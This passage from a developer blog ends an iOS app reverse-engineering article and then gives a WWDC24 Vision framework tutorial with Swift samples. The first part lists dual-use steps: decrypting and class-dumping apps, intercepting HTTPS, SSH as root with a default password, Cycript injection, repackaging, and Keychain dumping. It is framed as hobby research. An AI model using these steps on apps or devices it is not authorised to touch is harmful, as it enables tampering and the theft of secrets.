Be sure to specify the output path/filename because the default output path is /opt/dump/frida-ios-dump/
. To avoid moving it to /opt/dump
, specify the output path to avoid permission errors.
You will see /Payload/APP_NAME.app
Right-click on APP_NAME.app → “Show Package Contents” to see the APP’s resource directory.
Use the class-dump tool to export all the APP’s (including Framework) .h header file information (only for Objective-C, not effective for Swift projects).
nygard/class-dump I tried using this tool but failed repeatedly; eventually, I succeeded using the rewritten class-dump tool from AloneMonkey / MonkeyDev.
./class-dump -H APP_PATH/APP_NAME.app -o OUTPUT_PATH
After a successful dump, you can obtain the entire APP’s .h information.
You can use decompilation tools like IDA and Hopper for analysis. Both are paid tools, but Hopper offers a free trial (30 minutes per session).
Drag the obtained APP_NAME.app file directly into Hopper to start the analysis.
However, this is where I stopped, as it requires studying machine code, using class-dump results to infer methods, etc.; it requires very deep skills!
After breaking through the decompilation, you can modify the operation and repackage it into a new APP.
Image from One Piece
1. Using the free MITM Proxy tool to sniff API network request information
»The APP uses HTTPS transmission, but the data was still stolen.
2. Cycript (with a jailbroken phone) dynamic analysis/injection tool:
ssh root@PHONE_IP
(default is alpine
)ps -e | grep APP Bundle ID
to find the running APP Process IDcycript -p Process ID
to inject the tool into the running APPYou can use Objective-C/Javascript for debugging control.
For Example:
1
+2
+3
+
// Objective-C code block
+cy# alert = [[UIAlertView alloc] initWithTitle:@"HIHI" message:@"ZhgChg.li" delegate:nil cancelButtonTitle:@"Cancel" otherButtonTitles:nl]
+cy# [alert show]
+
Injecting a UIAlertViewController…
For detailed operations, refer to this article.
3. Lookin / Reveal View UI Layout Tools
Previously introduced, recommending again; also very useful in daily development of your own projects, suggest purchasing and using Reveal.
4. MonkeyDev Integration Tool for dynamically injecting and modifying APPs and repackaging them into new APPs
5. ptoomey3 / Keychain-Dumper for exporting KeyChain content
For detailed operations, refer to this article, but I didn’t succeed. Looking at the project issues, it seems to have become ineffective since iOS ≥ 12.
This field is a super big pit, requiring a lot of technical knowledge to master; this article just gives a superficial “experience” of what reverse engineering feels like. Apologies for any shortcomings! For academic research only, do not do bad things; personally, I find the whole process and tools quite interesting and it gives a better understanding of APP security!
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Vision framework review & trying out new Swift API in iOS 18
Photo by BoliviaInteligente
The relationship with Vision Pro is like the relationship between hot dogs and dogs, completely unrelated.
The Vision framework is Apple’s integrated image recognition framework for machine learning, allowing developers to easily and quickly implement common image recognition functions. The Vision framework was introduced as early as iOS 11.0+ (2017/iPhone 8) and has been continuously iterated and optimized. It enhances performance by integrating features with Swift Concurrency and provides a new Swift Vision framework API from iOS 18.0 to maximize the benefits of Swift Concurrency.
Features of Vision framework
Played around 6 years ago: Exploring Vision - Automatically Recognizing Faces for App Avatar Cropping (Swift)
This time, in conjunction with WWDC 24 Discover Swift enhancements in the Vision framework Session, revisiting and combining new Swift features to play again.
Apple also has another framework called CoreML, which is a machine learning framework based on On-Device chips. It allows you to train models for objects or documents you want to recognize and use the models directly in the app. Interested friends can also give it a try. (e.g. Real-time article classification, real-time spam message detection …)
Vision v.s. VisionKit:
Vision: Mainly used for image analysis tasks such as face recognition, barcode detection, text recognition, etc. It provides powerful APIs to handle and analyze visual content in static images or videos.
VisionKit: Specifically designed for tasks related to document scanning. It offers a scanner view controller that can be used to scan documents and generate high-quality PDFs or images.
The Vision framework cannot run on the M1 model in the simulator, it can only be tested on a physical device; running in a simulator environment will throw a Could not create Espresso context
error, no solution found in the official forum discussion.
Since I don’t have a physical iOS 18 device for testing, all the execution results in this article are based on the old (pre-iOS 18) syntax; please leave a comment if there are errors with the new syntax.
Discover Swift enhancements in the Vision framework
This article is a sharing note for WWDC 24 — Discover Swift enhancements in the Vision framework session, along with some experimental insights.
As of iOS 18, it supports 18 languages.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
// Supported language list
+if #available(iOS 18.0, *) {
+ print(RecognizeTextRequest().supportedRecognitionLanguages.map { "\($0.languageCode!)-\(($0.region?.identifier ?? $0.script?.identifier)!)" })
+} else {
+ print(try! VNRecognizeTextRequest().supportedRecognitionLanguages())
+}
+
+// The actual available recognition languages are based on this.
+// Tested on iOS 18, the output is as follows:
+// ["en-US", "fr-FR", "it-IT", "de-DE", "es-ES", "pt-BR", "zh-Hans", "zh-Hant", "yue-Hans", "yue-Hant", "ko-KR", "ja-JP", "ru-RU", "uk-UA", "th-TH", "vi-VT", "ar-SA", "ars-SA"]
+// Swedish language mentioned in WWDC was not seen, unsure if it has not been released yet or is related to device region and language settings
+
WWDC provided the above three images for explanation (under the same image quality), which are:
iOS ≥ 18 New API: CalculateImageAestheticsScoresRequest
1
+2
+3
+4
+5
+6
+7
+8
+
let request = CalculateImageAestheticsScoresRequest()
+let result = try await request.perform(on: URL(string: "https://zhgchg.li/assets/cb65fd5ab770/1*yL3vI1ADzwlovctW5WQgJw.jpeg")!)
+
+// Photo score
+print(result.overallScore)
+
+// Whether it is judged as a utility image
+print(result.isUtility)
+
In the past, only body pose and hand pose could be detected separately.
With this update, developers can detect both body and hand poses simultaneously, combining them into a single request and result, making it more convenient for further feature development.
iOS ≥ 18 New API: DetectHumanBodyPoseRequest
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
var request = DetectHumanBodyPoseRequest()
+// Detect hand pose together
+request.detectsHands = true
+
+guard let bodyPose = try await request.perform(on: image). first else { return }
+
+// Body Pose Joints
+let bodyJoints = bodyPose.allJoints()
+// Left hand Pose Joints
+let leftHandJoints = bodyPose.leftHand.allJoints()
+// Right hand Pose Joints
+let rightHandJoints = bodyPose.rightHand.allJoints()
+
Apple provides new Swift Vision API wrappers for developers in this update, in addition to basic support for existing functionalities, mainly focusing on enhancing Swift 6 / Swift Concurrency features, providing more efficient and Swift-like API operation methods.
The speaker here reintroduced the basic usage of the Vision framework. Apple has encapsulated 31 types of common image recognition requests and their corresponding “Observation” objects (as of iOS 18).
Request: DetectFaceRectanglesRequest - Face area recognition request Result: FaceObservation The previous article “Exploring Vision - Automatically Identify Faces for Avatar Upload in Apps (Swift)” used this pair of requests.
Request: RecognizeTextRequest - Text recognition request Result: RecognizedTextObservation
Request: GenerateObjectnessBasedSaliencyImageRequest - Objectness-based object recognition request Result: SaliencyImageObservation
Request Purpose | Observation Description |
---|---|
CalculateImageAestheticsScoresRequest Calculate the aesthetic score of the image. | AestheticsObservation Returns the aesthetic score of the image, considering factors like composition and color. |
ClassifyImageRequest Classify the content of the image. | ClassificationObservation Returns the classification labels and confidence of objects or scenes in the image. |
CoreMLRequest Analyze images using Core ML models. | CoreMLFeatureValueObservation Generates observations based on the output of Core ML models. |
DetectAnimalBodyPoseRequest Detect animal poses in images. | RecognizedPointsObservation Returns the skeleton points and their positions of animals. |
DetectBarcodesRequest Detect barcodes in images. | BarcodeObservation Returns barcode data and types (e.g., QR code). |
DetectContoursRequest Detect contours in images. | ContoursObservation Returns detected contour lines in the image. |
DetectDocumentSegmentationRequest Detect and segment documents in images. | RectangleObservation Returns the rectangular boundary positions of documents. |
DetectFaceCaptureQualityRequest Evaluate the quality of face captures. | FaceObservation Returns quality assessment scores for facial images. |
DetectFaceLandmarksRequest Detect facial landmarks. | FaceObservation Returns detailed positions of facial landmarks (e.g., eyes, nose). |
DetectFaceRectanglesRequest Detect faces in images. | FaceObservation Returns the bounding box positions of faces. |
DetectHorizonRequest Detect horizons in images. | HorizonObservation Returns the angle and position of the horizon. |
DetectHumanBodyPose3DRequest Detect 3D human body poses in images. | RecognizedPointsObservation Returns 3D human skeleton points and their spatial coordinates. |
DetectHumanBodyPoseRequest Detect human body poses in images. | RecognizedPointsObservation Returns human skeleton points and their coordinates. |
DetectHumanHandPoseRequest Detect hand poses in images. | RecognizedPointsObservation Returns hand skeleton points and their positions. |
DetectHumanRectanglesRequest Detect humans in images. | HumanObservation Returns the bounding box positions of humans. |
DetectRectanglesRequest Detect rectangles in images. | RectangleObservation Returns the coordinates of the four vertices of rectangles. |
DetectTextRectanglesRequest Detect text regions in images. | TextObservation Returns the positions and bounding boxes of text regions. |
DetectTrajectoriesRequest Detect and analyze object motion trajectories. | TrajectoryObservation Returns motion trajectory points and their time series. |
GenerateAttentionBasedSaliencyImageRequest Generate attention-based saliency images. | SaliencyImageObservation Returns saliency maps of the most attractive areas in the image. |
GenerateForegroundInstanceMaskRequest Generate foreground instance mask images. | InstanceMaskObservation Returns masks of foreground objects. |
GenerateImageFeaturePrintRequest Generate image feature prints for comparison. | FeaturePrintObservation Returns feature fingerprint data of images for similarity comparison. |
GenerateObjectnessBasedSaliencyImageRequest Generate objectness-based saliency images. | SaliencyImageObservation Returns saliency maps of object saliency areas. |
GeneratePersonInstanceMaskRequest Generate person instance mask images. | InstanceMaskObservation Returns masks of person instances. |
GeneratePersonSegmentationRequest Generate person segmentation images. | SegmentationObservation Returns binary images of person segmentation. |
RecognizeAnimalsRequest Detect and identify animals in images. | RecognizedObjectObservation Returns animal types and their confidence levels. |
RecognizeTextRequest Detect and identify text in images. | RecognizedTextObservation Returns detected text content and its spatial positions. |
TrackHomographicImageRegistrationRequest Track homographic image registration. | ImageAlignmentObservation Returns homographic transformation matrices between images for image registration. |
TrackObjectRequest Track objects in images. | DetectedObjectObservation Returns the positions and velocity information of objects in images. |
TrackOpticalFlowRequest Track optical flow in images. | OpticalFlowObservation Returns optical flow vector fields describing pixel movements. |
TrackRectangleRequest Track rectangles in images. | RectangleObservation Returns the positions, sizes, and rotation angles of rectangles in images. |
TrackTranslationalImageRegistrationRequest Track translational image registration. | ImageAlignmentObservation Returns translational transformation matrices between images for image registration. |
The speaker mentioned several commonly used Requests as follows.
Recognize the input image, obtain label classification and confidence.
[Travelogue] 2024 Second Visit to Kyushu 9-Day Free and Easy Trip, Entering Fukuoka by Busan→Hakata Cruise
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+
if #available(iOS 18.0, *) {
+ // New API using Swift features
+ let request = ClassifyImageRequest()
+ Task {
+ do {
+ let observations = try await request.perform(on: URL(string: "https://zhgchg.li/assets/cb65fd5ab770/1*yL3vI1ADzwlovctW5WQgJw.jpeg")!)
+ observations.forEach {
+ observation in
+ print("\(observation.identifier): \(observation.confidence)")
+ }
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+} else {
+ // Old method
+ let completionHandler: VNRequestCompletionHandler = {
+ request, error in
+ guard error == nil else {
+ print("Request failed: \(String(describing: error))")
+ return
+ }
+ guard let observations = request.results as? [VNClassificationObservation] else {
+ return
+ }
+ observations.forEach {
+ observation in
+ print("\(observation.identifier): \(observation.confidence)")
+ }
+ }
+
+ let request = VNClassifyImageRequest(completionHandler: completionHandler)
+ DispatchQueue.global().async {
+ let handler = VNImageRequestHandler(url: URL(string: "https://zhgchg.li/assets/cb65fd5ab770/1*3_jdrLurFuUfNdW4BJaRww.jpeg")!, options: [:])
+ do {
+ try handler.perform([request])
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+}
+
Analysis Results:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+
• outdoor: 0.75392926
+ • sky: 0.75392926
+ • blue_sky: 0.7519531
+ • machine: 0.6958008
+ • cloudy: 0.26538086
+ • structure: 0.15728651
+ • sign: 0.14224191
+ • fence: 0.118652344
+ • banner: 0.0793457
+ • material: 0.075975396
+ • plant: 0.054406323
+ • foliage: 0.05029297
+ • light: 0.048126098
+ • lamppost: 0.048095703
+ • billboards: 0.040039062
+ • art: 0.03977703
+ • branch: 0.03930664
+ • decoration: 0.036868922
+ • flag: 0.036865234
+....etc
+
Recognize the text content in the image (a.k.a OCR)
[Travelogue] 2023 Tokyo 5-day free trip](../9da2c51fa4f2/)
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+
if #available(iOS 18.0, *) {
+ // New API using Swift features
+ var request = RecognizeTextRequest()
+ request.recognitionLevel = .accurate
+ request.recognitionLanguages = [.init(identifier: "ja-JP"), .init(identifier: "en-US")] // Specify language code, e.g., Traditional Chinese
+ Task {
+ do {
+ let observations = try await request.perform(on: URL(string: "https://zhgchg.li/assets/9da2c51fa4f2/1*fBbNbDepYioQ-3-0XUkF6Q.jpeg")!)
+ observations.forEach {
+ observation in
+ let topCandidate = observation.topCandidates(1).first
+ print(topCandidate?.string ?? "No text recognized")
+ }
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+} else {
+ // Old way
+ let completionHandler: VNRequestCompletionHandler = {
+ request, error in
+ guard error == nil else {
+ print("Request failed: \(String(describing: error))")
+ return
+ }
+ guard let observations = request.results as? [VNRecognizedTextObservation] else {
+ return
+ }
+ observations.forEach {
+ observation in
+ let topCandidate = observation.topCandidates(1).first
+ print(topCandidate?.string ?? "No text recognized")
+ }
+ }
+
+ let request = VNRecognizeTextRequest(completionHandler: completionHandler)
+ request.recognitionLevel = .accurate
+ request.recognitionLanguages = ["ja-JP", "en-US"] // Specify language code, e.g., Traditional Chinese
+ DispatchQueue.global().async {
+ let handler = VNImageRequestHandler(url: URL(string: "https://zhgchg.li/assets/9da2c51fa4f2/1*fBbNbDepYioQ-3-0XUkF6Q.jpeg")!, options: [:])
+ do {
+ try handler.perform([request])
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+}
+
Analysis Result:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+
LE LABO Aoyama Store
+TEL:03-6419-7167
+*Thank you for your purchase*
+No: 21347
+Date: 2023/06/10 14.14.57
+Responsible:
+1690370
+Register: 008A 1
+Product Name
+Tax-inclusive Price Quantity Tax-inclusive Total
+Kaiak 10 EDP FB 15ML
+J1P7010000S
+16,800
+16,800
+Another 13 EDP FB 15ML
+J1PJ010000S
+10,700
+10,700
+Lip Balm 15ML
+JOWC010000S
+2,000
+1
+Total Amount
+(Tax Included)
+CARD
+2,000
+3 items purchased
+29,500
+0
+29,500
+29,500
+
Detect barcode and QR code data in the image.
Thai locals recommend Goose Brand Cooling Gel
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+
let filePath = Bundle.main.path(forResource: "IMG_6777", ofType: "png")! // Local test image
+let fileURL = URL(filePath: filePath)
+if #available(iOS 18.0, *) {
+ // New API using Swift features
+ let request = DetectBarcodesRequest()
+ Task {
+ do {
+ let observations = try await request.perform(on: fileURL)
+ observations.forEach {
+ observation in
+ print("Payload: \(observation.payloadString ?? "No payload")")
+ print("Symbology: \(observation.symbology)")
+ }
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+} else {
+ // Old way
+ let completionHandler: VNRequestCompletionHandler = {
+ request, error in
+ guard error == nil else {
+ print("Request failed: \(String(describing: error))")
+ return
+ }
+ guard let observations = request.results as? [VNBarcodeObservation] else {
+ return
+ }
+ observations.forEach {
+ observation in
+ print("Payload: \(observation.payloadStringValue ?? "No payload")")
+ print("Symbology: \(observation.symbology.rawValue)")
+ }
+ }
+
+ let request = VNDetectBarcodesRequest(completionHandler: completionHandler)
+ DispatchQueue.global().async {
+ let handler = VNImageRequestHandler(url: fileURL, options: [:])
+ do {
+ try handler.perform([request])
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+}
+
Analysis Results:
1
+2
+3
+4
+5
+6
+7
+8
+
Payload: 8859126000911
+Symbology: VNBarcodeSymbologyEAN13
+Payload: https://lin.ee/hGynbVM
+Symbology: VNBarcodeSymbologyQR
+Payload: http://www.hongthaipanich.com/
+Symbology: VNBarcodeSymbologyQR
+Payload: https://www.facebook.com/qr?id=100063856061714
+Symbology: VNBarcodeSymbologyQR
+
Recognize animals in the image with confidence.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+
let filePath = Bundle.main.path(forResource: "IMG_5026", ofType: "png")! // Local test image
+let fileURL = URL(filePath: filePath)
+if #available(iOS 18.0, *) {
+ // New API using Swift features
+ let request = RecognizeAnimalsRequest()
+ Task {
+ do {
+ let observations = try await request.perform(on: fileURL)
+ observations.forEach {
+ observation in
+ let labels = observation.labels
+ labels.forEach {
+ label in
+ print("Detected animal: \(label.identifier) with confidence: \(label.confidence)")
+ }
+ }
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+} else {
+ // Old way
+ let completionHandler: VNRequestCompletionHandler = {
+ request, error in
+ guard error == nil else {
+ print("Request failed: \(String(describing: error))")
+ return
+ }
+ guard let observations = request.results as? [VNRecognizedObjectObservation] else {
+ return
+ }
+ observations.forEach {
+ observation in
+ let labels = observation.labels
+ labels.forEach {
+ label in
+ print("Detected animal: \(label.identifier) with confidence: \(label.confidence)")
+ }
+ }
+ }
+
+ let request = VNRecognizeAnimalsRequest(completionHandler: completionHandler)
+ DispatchQueue.global().async {
+ let handler = VNImageRequestHandler(url: fileURL, options: [:])
+ do {
+ try handler.perform([request])
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+}
+
Analysis Results:
1
+
Detected animal: Cat with confidence: 0.77245045
+
1
+2
+3
+4
+
VN*Request -> *Request (e.g. VNDetectBarcodesRequest -> DetectBarcodesRequest)
+VN*Observation -> *Observation (e.g. VNRecognizedObjectObservation -> RecognizedObjectObservation)
+VNRequestCompletionHandler -> async/await
+VNImageRequestHandler.perform([VN*Request]) -> *Request.perform()
+
The official WWDC video uses a supermarket product scanner as an example.
We can obtain the location of the Barcode from observation.boundingBox
, but unlike the common UIView coordinate system, the BoundingBox
’s relative position starts from the lower left corner, with values ranging from 0 to 1.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+
let filePath = Bundle.main.path(forResource: "IMG_6785", ofType: "png")! // Local test image
+let fileURL = URL(filePath: filePath)
+if #available(iOS 18.0, *) {
+ // New API using Swift features
+ var request = DetectBarcodesRequest()
+ request.symbologies = [.ean13] // If only scanning EAN13 Barcode is needed, it can be specified directly to improve performance
+ Task {
+ do {
+ let observations = try await request.perform(on: fileURL)
+ if let observation = observations.first {
+ DispatchQueue.main.async {
+ self.infoLabel.text = observation.payloadString
+ // Color layer marking
+ let colorLayer = CALayer()
+ // iOS >=18 new coordinate transformation API toImageCoordinates
+ // Not tested, may need to calculate the offset for ContentMode = AspectFit:
+ colorLayer.frame = observation.boundingBox.toImageCoordinates(self.baseImageView.frame.size, origin: .upperLeft)
+ colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
+ self.baseImageView.layer.addSublayer(colorLayer)
+ }
+ print("BoundingBox: \(observation.boundingBox.cgRect)")
+ print("Payload: \(observation.payloadString ?? "No payload")")
+ print("Symbology: \(observation.symbology)")
+ }
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+} else {
+ // Old approach
+ let completionHandler: VNRequestCompletionHandler = {
+ request, error in
+ guard error == nil else {
+ print("Request failed: \(String(describing: error))")
+ return
+ }
+ guard let observations = request.results as? [VNBarcodeObservation] else {
+ return
+ }
+ if let observation = observations.first {
+ DispatchQueue.main.async {
+ self.infoLabel.text = observation.payloadStringValue
+ // Color layer marking
+ let colorLayer = CALayer()
+ colorLayer.frame = self.convertBoundingBox(observation.boundingBox, to: self.baseImageView)
+ colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
+ self.baseImageView.layer.addSublayer(colorLayer)
+ }
+ print("BoundingBox: \(observation.boundingBox)")
+ print("Payload: \(observation.payloadStringValue ?? "No payload")")
+ print("Symbology: \(observation.symbology.rawValue)")
+ }
+ }
+
+ let request = VNDetectBarcodesRequest(completionHandler: completionHandler)
+ request.symbologies = [.ean13] // If only scanning EAN13 Barcode is needed, it can be specified directly to improve performance
+ DispatchQueue.global().async {
+ let handler = VNImageRequestHandler(url: fileURL, options: [:])
+ do {
+ try handler.perform([request])
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+}
+
iOS ≥ 18 Update Highlight:
// iOS ≥18 New Coordinate Transformation API toImageCoordinates
+observation.boundingBox.toImageCoordinates(CGSize, origin: .upperLeft)
+// https://developer.apple.com/documentation/vision/normalizedpoint/toimagecoordinates(from:imagesize:origin:)
+
Helper:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+
// Generated by ChatGPT 4o
+// Since the photo in the ImageView is set with ContentMode = AspectFit
+// Extra calculation is needed for the top and bottom offset caused by Fit
+func convertBoundingBox(_ boundingBox: CGRect, to view: UIImageView) -> CGRect {
+ guard let image = view.image else {
+ return .zero
+ }
+
+ let imageSize = image.size
+ let viewSize = view.bounds.size
+ let imageRatio = imageSize.width / imageSize.height
+ let viewRatio = viewSize.width / viewSize.height
+ var scaleFactor: CGFloat
+ var offsetX: CGFloat = 0
+ var offsetY: CGFloat = 0
+ if imageRatio > viewRatio {
+ // Image fits in the width direction
+ scaleFactor = viewSize.width / imageSize.width
+ offsetY = (viewSize.height - imageSize.height * scaleFactor) / 2
+ }
+
+ else {
+ // Image fits in the height direction
+ scaleFactor = viewSize.height / imageSize.height
+ offsetX = (viewSize.width - imageSize.width * scaleFactor) / 2
+ }
+
+ let x = boundingBox.minX * imageSize.width * scaleFactor + offsetX
+ let y = (1 - boundingBox.maxY) * imageSize.height * scaleFactor + offsetY
+ let width = boundingBox.width * imageSize.width * scaleFactor
+ let height = boundingBox.height * imageSize.height * scaleFactor
+ return CGRect(x: x, y: y, width: width, height: height)
+}
+
Output:
1
+2
+3
+
BoundingBox: (0.5295758928571429, 0.21408638121589782, 0.0943080357142857, 0.21254415360708087)
+Payload: 4710018183805
+Symbology: VNBarcodeSymbologyEAN13
+
Therefore, our scanner also needs to support scanning pure text labels simultaneously.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+
let filePath = Bundle.main.path(forResource: "apple", ofType: "jpg")! // Local test image
+let fileURL = URL(filePath: filePath)
+if #available(iOS 18.0, *) {
+ // New API using Swift features
+ var barcodesRequest = DetectBarcodesRequest()
+ barcodesRequest.symbologies = [.ean13] // If only scanning EAN13 Barcode is needed, it can be specified directly to improve performance
+ var textRequest = RecognizeTextRequest()
+ textRequest.recognitionLanguages = [.init(identifier: "zh-Hnat"), .init(identifier: "en-US")]
+ Task {
+ do {
+ let handler = ImageRequestHandler(fileURL)
+ // parameter pack syntax and we must wait for all requests to finish before we can use their results.
+ // let (barcodesObservation, textObservation, ...) = try await handler.perform(barcodesRequest, textRequest, ...)
+ let (barcodesObservation, textObservation) = try await handler.perform(barcodesRequest, textRequest)
+ if let observation = barcodesObservation.first {
+ DispatchQueue.main.async {
+ self.infoLabel.text = observation.payloadString
+ // Color layer
+ let colorLayer = CALayer()
+ // New Coordinate Transformation API toImageCoordinates for iOS >=18
+ // Not tested, may need to consider the offset of ContentMode = AspectFit:
+ colorLayer.frame = observation.boundingBox.toImageCoordinates(self.baseImageView.frame.size, origin: .upperLeft)
+ colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
+ self.baseImageView.layer.addSublayer(colorLayer)
+ }
+ print("BoundingBox: \(observation.boundingBox.cgRect)")
+ print("Payload: \(observation.payloadString ?? "No payload")")
+ print("Symbology: \(observation.symbology)")
+ }
+ textObservation.forEach {
+ observation in
+ let topCandidate = observation.topCandidates(1).first
+ print(topCandidate?.string ?? "No text recognized")
+ }
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+} else {
+ // Old approach
+ let barcodesCompletionHandler: VNRequestCompletionHandler = {
+ request, error in
+ guard error == nil else {
+ print("Request failed: \(String(describing: error))")
+ return
+ }
+ guard let observations = request.results as? [VNBarcodeObservation] else {
+ return
+ }
+ if let observation = observations.first {
+ DispatchQueue.main.async {
+ self.infoLabel.text = observation.payloadStringValue
+ // Color layer
+ let colorLayer = CALayer()
+ colorLayer.frame = self.convertBoundingBox(observation.boundingBox, to: self.baseImageView)
+ colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
+ self.baseImageView.layer.addSublayer(colorLayer)
+ }
+ print("BoundingBox: \(observation.boundingBox)")
+ print("Payload: \(observation.payloadStringValue ?? "No payload")")
+ print("Symbology: \(observation.symbology.rawValue)")
+ }
+ }
+
+ let textCompletionHandler: VNRequestCompletionHandler = {
+ request, error in
+ guard error == nil else {
+ print("Request failed: \(String(describing: error))")
+ return
+ }
+ guard let observations = request.results as? [VNRecognizedTextObservation] else {
+ return
+ }
+ observations.forEach {
+ observation in
+ let topCandidate = observation.topCandidates(1).first
+ print(topCandidate?.string ?? "No text recognized")
+ }
+ }
+
+ let barcodesRequest = VNDetectBarcodesRequest(completionHandler: barcodesCompletionHandler)
+ barcodesRequest.symbologies = [.ean13] // If only scanning EAN13 Barcode is needed, it can be specified directly to improve performance
+ let textRequest = VNRecognizeTextRequest(completionHandler: textCompletionHandler)
+ textRequest.recognitionLevel = .accurate
+ textRequest.recognitionLanguages = ["en-US"]
+ DispatchQueue.global().async {
+ let handler = VNImageRequestHandler(url: fileURL, options: [:])
+ do {
+ try handler.perform([barcodesRequest, textRequest])
+ }
+ catch {
+ print("Request failed: \(error)")
+ }
+ }
+}
+
Output:
1
+2
+3
+4
+
94128s
+ORGANIC
+Pink Lady®
+Produce of USh
+
iOS ≥ 18 Update Highlight:
1
+2
+3
+4
+
let handler = ImageRequestHandler(fileURL)
+// parameter pack syntax and we must wait for all requests to finish before we can use their results.
+// let (barcodesObservation, textObservation, ...) = try await handler.perform(barcodesRequest, textRequest, ...)
+let (barcodesObservation, textObservation) = try await handler.perform(barcodesRequest, textRequest)
+
The previous perform(barcodesRequest, textRequest)
method for handling Barcode scanning and text recognition required both requests to be completed before continuing execution; starting from iOS 18, a new performAll()
method is provided, changing the response method to streaming, allowing corresponding processing as soon as one of the requests is received, such as responding directly when a Barcode is scanned.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+
if #available(iOS 18.0, *) {
+ // New API using Swift features
+ var barcodesRequest = DetectBarcodesRequest()
+ barcodesRequest.symbologies = [.ean13] // If only scanning EAN13 Barcodes is needed, it can be specified directly to improve performance
+ var textRequest = RecognizeTextRequest()
+ textRequest.recognitionLanguages = [.init(identifier: "zh-Hnat"), .init(identifier: "en-US")]
+ Task {
+ let handler = ImageRequestHandler(fileURL)
+ let observation = handler.performAll([barcodesRequest, textRequest] as [any VisionRequest])
+ for try await result in observation {
+ switch result {
+ case .detectBarcodes(_, let barcodesObservation):
+ if let observation = barcodesObservation.first {
+ DispatchQueue.main.async {
+ self.infoLabel.text = observation.payloadString
+ // Color layer marking
+ let colorLayer = CALayer()
+ // iOS >=18 new coordinate transformation API toImageCoordinates
+ // Not tested, may still need to calculate the offset for ContentMode = AspectFit:
+ colorLayer.frame = observation.boundingBox.toImageCoordinates(self.baseImageView.frame.size, origin: .upperLeft)
+ colorLayer.backgroundColor = UIColor.red.withAlphaComponent(0.5).cgColor
+ self.baseImageView.layer.addSublayer(colorLayer)
+ }
+ print("BoundingBox: \(observation.boundingBox.cgRect)")
+ print("Payload: \(observation.payloadString ?? "No payload")")
+ print("Symbology: \(observation.symbology)")
+ }
+ case .recognizeText(_, let textObservation):
+ textObservation.forEach {
+ observation in
+ let topCandidate = observation.topCandidates(1).first
+ print(topCandidate?.string ?? "No text recognized")
+ }
+ default:
+ print("Unrecognized result: \(result)")
+ }
+ }
+ }
+}
+
Assuming we have a list of image wall, and each image needs to automatically crop out the main object; this is where we can leverage Swift Concurrency to improve loading efficiency.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
func generateThumbnail(url: URL) async throws -> UIImage {
+ let request = GenerateAttentionBasedSaliencyImageRequest()
+ let saliencyObservation = try await request.perform(on: url)
+ return cropImage(url, to: saliencyObservation.salientObjects)
+}
+
+func generateAllThumbnails() async throws {
